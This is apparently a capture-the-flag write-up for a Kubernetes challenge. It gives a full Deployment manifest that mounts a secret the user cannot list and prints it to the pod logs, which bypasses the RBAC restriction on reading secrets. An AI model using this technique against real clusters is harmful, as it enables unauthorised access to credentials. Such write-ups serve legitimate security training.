punkctf/k8s_03.md


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39

Using `kubectl auth can-i --list`, we see that we can't access secrets anymore, but we can create deployments.

Looking at the existing pod, we see that it mounts a secret called `y0u-cant-l1st-m3-s3crets-n0w`, but it only outputs the hash and we can't exec into it in this challenge.

We can create a deployment similar to the existing pod, but without the hashing:

```yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  name: flag-getter
spec:
  replicas: 1
  selector:
    matchLabels:
      app: flag-getter
  template:
    metadata:
      labels:
        app: flag-getter
    spec:
      containers:
      - command:
        - cat
        - /flag/flag
        image: busybox
        imagePullPolicy: IfNotPresent
        name: flag-getter
        volumeMounts:
        - mountPath: /flag
          name: flag
      volumes:
        - name: flag
          secret:
            secretName: y0u-cant-l1st-m3-s3crets-n0w
```

This will die immediately, but that's fine - just read the pod logs and it will have the flag.